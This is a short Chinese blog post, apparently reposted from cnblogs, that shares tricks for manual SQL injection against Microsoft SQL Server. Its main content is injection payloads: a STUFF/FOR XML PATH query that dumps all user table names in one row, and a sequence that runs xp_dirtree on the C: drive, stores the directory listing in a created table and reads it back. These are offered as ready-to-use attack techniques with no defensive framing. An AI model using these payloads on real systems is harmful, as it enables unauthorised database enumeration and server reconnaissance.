當前位置：首頁 > 运维知识 > 数据库 >内容正文

数据库

SQL注入小技巧

發布時間：2024/10/8 数据库 35 豆豆

生活随笔收集整理的這篇文章主要介紹了 SQL注入小技巧小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

平時手工MSSQL注入的時候如果不能反彈寫入，那么大多數都是把記錄一條一條讀出來，這樣太累了，這里給出1條語句，有興趣的朋友可以試試，類似MYSQL的group_concat ！效果還是不錯的！

測試1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t? where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

測試2：

create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

轉載于:https://www.cnblogs.com/amwld/archive/2011/04/19/2020417.html

與50位技術專家面對面20年技術見證，附贈技術全景圖

以上是生活随笔為你收集整理的SQL注入小技巧的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。